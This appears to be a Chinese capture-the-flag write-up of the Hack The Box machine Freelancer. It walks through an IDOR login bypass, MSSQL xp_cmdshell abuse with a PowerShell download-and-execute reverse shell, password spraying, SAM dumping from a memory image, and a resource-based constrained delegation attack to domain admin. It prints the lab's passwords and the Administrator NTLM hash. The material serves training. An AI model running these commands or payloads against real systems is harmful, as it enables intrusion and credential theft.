htb_Freelancer

2024-06-16 07:04
文章标签 htb freelancer

本文主要是介绍htb_Freelancer,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在这里插入图片描述
端口扫描

80 88 389 445
在这里插入图片描述
扫描ldap协议相关漏洞,没有发现
在这里插入图片描述
扫描子域名,加入/etc/hosts(后面发现没用)
在这里插入图片描述
枚举域用户
在这里插入图片描述
目录扫描,发现一个/admin目录
在这里插入图片描述
访问后发现要账号密码
在这里插入图片描述
访问80端口,注册一个freelancer用户

查看Blog,底部评论区可看见有用户

在这里插入图片描述
点击用户查看,发现修改url中的数字可以查看不同用户

在这里插入图片描述

当url为http://freelancer.htb/accounts/profile/visit/2/时,为admin用户的个人信息
在这里插入图片描述

到处看都没其他发现,回头注册一个employer account
在这里插入图片描述

找一下哪里可以激活账户
重新进行目录扫描,这次直接扫描/accounts目录,发现一个/accounts/recovery/目录
在这里插入图片描述

输入注册时填的信息,提交后就可以通过认证了
在这里插入图片描述

功能和Freelancer用户大差不差
在这里插入图片描述

看个人信息配置,发现一个二维码,提示扫码后可以直接登录账户
在这里插入图片描述

扫一下,扫出来一个url
url后面那截很耐人寻味,MTAwMTA=,=结尾看上去就像base64
在这里插入图片描述

果不其然,解码后发现是一个用户编号
在这里插入图片描述

想起来刚刚看见admin用户的编号是2,将2进行base64编码,修改url信息
在这里插入图片描述
后面是随机序列,只有五分钟有效期

http://freelancer.htb/accounts/login/otp/Mg==/xxxxxxxxxxxxxxxxxxxxxxxx/

访问url,成功切换到admin用户,这里存在IDOR越权漏洞

在这里插入图片描述

重新访问刚刚需要密码登录的/admin/目录,直接就进来了

在这里插入图片描述

底下有个sql terminal,可以执行sql命令在这里插入图片描述

尝试使用xp_cmdshell,权限拒绝
在这里插入图片描述

查看数据库所有者,sqlServer一般是sa

SELECT suser_sname(owner_sid) FROM sys.databases

,

查看数据库用户,现在的用户大概是guest或者最底下那个Freelancer_webapp_user

EXECUTE AS LOGIN = 'sa'
SELECT name FROM sys.database_principals WHERE type_desc IN ('SQL_USER', 'WINDOWS_USER', 'WINDOWS_GROUP');

在这里插入图片描述

查看sa是否为数据库管理员(有执行命令权限)

EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin');

在这里插入图片描述

使用sa权限为Freelancer_webapp_user用户授予sysadmin权限

EXECUTE AS LOGIN = 'sa'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user','sysadmin';

查看当前用户是否为sysadmin权限

SELECT IS_SRVROLEMEMBER('sysadmin');

在这里插入图片描述

启用xp_cmdshell

EXEC sp_configure 'show advanced options', '1';
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', '1' ;
RECONFIGURE;

在这里插入图片描述

可以执行cmd命令了
反弹shell(gitHub上找了一个最新的)添加链接描述

EXECUTE xp_cmdshell ‘powershell -c iex(iwr -usebasicparsing http://10.10.14.50:8899/shel1.ps1)’
在这里插入图片描述

查看用户列表
在这里插入图片描述
C:\users\sql_sve\Downloads\SqLEXPR-2019_x64_ENU目录下发现一个configuration文件
在这里插入图片描述

IL0v3ErenY3ager
t3mp0r@ryS@PWD

将两个密码弄出来做字典

再把刚刚的用户列表也弄下来

Administrator
lkazanof
lorra199
mikasaAckerman
MSSQLSERVER
sqlbackupoperator
sql_svc

使用crackmapexec进行密码喷洒

crackmapexec smb 10.10.11.5 -u user.txt -p pass.txt --sam

在这里插入图片描述
mikasaAckerman/IL0v3ErenY3ager

上传RunasCs,登录

curl http://10.10.14.50:8899/RunasCs.exe -o RunasCs.exe

在这里插入图片描述

./RunasCs.exe mikasaAckerman IL0v3ErenY3ager powershell -r 10.10.14.50:2222

成功切换到mikasaAckerman用户

在这里插入图片描述

找user.txt的时候发现目录底下有两个特殊文件
在这里插入图片描述
mail.txt中重点是给了一个dump文件,大概就是目录里的MEMORY.7z
在这里插入图片描述
目标机器上有python,直接开启一个http服务,将MEMORY.7z下载到本地
在这里插入图片描述
下载速度有点小慢

在这里插入图片描述

解压后是一个dmp文件

在这里插入图片描述

使用memprocfs将dmp中虚拟文件系统挂载到本机的物理内存,可以查看文件目录

./memprocfs -device MEMORY.DMP -mount /mnt

在这里插入图片描述
该目录底下是windows注册表配置单元,使用secretsdump可以从注册表中提取密码

system,security,sam几个文件搂下来

在这里插入图片描述
改一下名字

mv 0xffffd3067d935000-SAM-MACHINE_SAM.reghive sammv 0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive systemmv 0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive security

使用secretsdump解密密码
在这里插入图片描述

impacket-secretsdump -sam sam -system system -security security local

在这里插入图片描述

PWN3D#l0rr@Armessa199

继续进行喷洒

crackmapexec smb 10.10.11.5 -u user.txt -P PWN3D#l0rr@Armessa199

得到新用户凭据

lorra199:PWN3D#l0rr@Armessa199

机器开放了5985端口,可以远程登录

在这里插入图片描述

evil-winrm -i 10.10.11.5 -u "lorra199" -p "PWN3D#l0rr@Armessa199"

在这里插入图片描述
同步时间

ntpdate -q freelancer.htb

在这里插入图片描述

使用bloodhound探测域内环境

faketime -f +5h bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa199' -d freelancer.htb -ns 10.10.11.5

在这里插入图片描述
发现lorra199用户位于AD RECYCLE BIN组内,该组对dc有GenericWrite权限

同时lorra199用户可以添加机器用户,可以通过修改dc的msDS-AllowedToActOnBehalfOfOtherIdentity属性进行基于资源的约束性委派攻击
在这里插入图片描述
添加机器用户

impacket-addcomputer -computer-name 'cccc$' -computer-pass '123456cc!' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'

在这里插入图片描述

使用impacket的rbcd模块进行攻击,修改DC$的msDS-AllowedToActOnBehalfOfOtherIdentity属性指向cccc$

impacket-rbcd -delegate-from 'cccc$' -delegate-to 'DC$' -dc-ip 10.10.11.5 -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'

在这里插入图片描述

getST模块获取到administrator的cifs/dc.freelancer.htb的ST

faketime -f +5h impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 freelancer.htb/cccc$:'123456cc!'

在这里插入图片描述

将票据导入内存

export KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache

secretsdump提取administrator密码

faketime -f +5h impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.10.11.5 -target-ip 10.10.11.5 -just-dc-ntlm

在这里插入图片描述

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::

使用evil-winrm登录

evil-winrm -i freelancer.htb -u administrator -H '0039318f1e8274633445bce32ad1a290'

在这里插入图片描述

这篇关于htb_Freelancer的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1065771

相关文章

HTB-You know 0xDiablos

引言 项目概述:HTB的EASY难度 PWN靶机 You know 0xDiablos https://app.hackthebox.com/challenges/106 本文详细解释了溢出payload的结构以及为什么要这样构造,友好的为想要入手PWN的朋友解释了原理技术点涉及: 32位linux逆向、32位程序调用、栈溢出目标与读者:网络安全兴趣爱好者、PWN新手 基本情况 运行看看

HTB-bike(SSTI模版注入)

前言 大家好,我是qmx_07,今天给大家讲解bike靶场 渗透过程 信息搜集 服务器开放了 22 ssh 和 http80端口 Wappalyzer 介绍:Wappalyzer是一种浏览器扩展程序,用于识别正在访问的网站所使用的技术栈和工具,比如使用的web框架,编程语言等 服务器所使用Express框架 发现SSTI模版注入 可以看到这个输入框,用来输出 内容尝试x

HTB-lgnition(curl工具、yakit、 弱口令)

前言 各位师傅大家好,我是qmx_07,今天来讲解lgnition靶机 渗透流程 信息搜集 服务器开放了80 http端口 curl工具 介绍:curl工具是一个用于发送HTTP请求的命令行工具。它支持多种协议,包括HTTP、HTTPS、FTP、SMTP等,并且支持各种常见的操作,如GET、POST、PUT、DELETE等。 -v显示输出与请求和响应相关的详细信息,包括请求头

HTB-Crocodile(FTP和web综合利用)

前言 各位师傅大家好,今天给大家讲解Crocodile靶机 渗透过程 信息搜集 服务器开放了21FTP和80HTTP服务思路:可以尝试 匿名登录FTP 或者 尝试WEB登录后台 FTP匿名登录 通过anonymous 匿名登录到FTP服务器allowed.userlist 和 allowed.usserlist.pass 分别是 账户和密码 Web目录爆破 服务器有

HTB-Mongod(MongoDb数据库)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Mongod靶场 Mongod 渗透过程 RustScan 介绍:Rustscan是一款用Rust语言开发的高速端口扫描器,它可以在3秒内扫描所有65535个端口,并支持脚本引擎和自适应学习功能,并且可以和nmap进行联动可以简单理解成 多线程的nmap扫描器 RustScan安装: 1.创建文件夹mkdir Rustsca

HTB-Redeemer(redis)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Redeemer这台机器,主要是对redis组件进行渗透,了解思路 渗透过程 更改一下 目录结构,先写 渗透过程,再写 题解 信息搜集 通过nmap扫描 发现开启了6379 redis服务,尝试连接注意:nmap 扫描 可以先确定端口开放情况,在进行系统版本扫描,这样会快一些 连接redis数据库 使用redis-cl

入门三.HTB--Dancing(6.18)

大佬 https://www.cnblogs.com/Hekeats-L/p/16535920.html 任务1 SMB 即Server Message Block(服务器消息块),是一种文件共享协议。当文件原件在你的A电脑上,而你想在局域网下用你的手机、iPad或是另一台电脑来访问A电脑上的该文件时,你可能需要用到SMB共享。 任务2 SMB端口服务 nmap -sV

htb-linux-1-lame-smb3.0.20

namp smb漏洞 搜索关键词 其他 smb Samba是在linux和unix系统上实现SMB(Server Message Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件和打印机的通信协议,它在局域网内使用linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。

htb-linux-3-shocker

nmap web渗透 由于只有80端口,只考虑目录扫描和静态文件提醒 为什么能能知道http://10.10.10.56/cgi-bin/user.sh? 因为百度的 curl访问该文件 shell flag root

htb-window-4-Optimum-HttpFileServer 2.3

nmap exploit-HttpFileServer 2.3 生成ps1反弹shell 模拟漏洞案例的请求 python 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString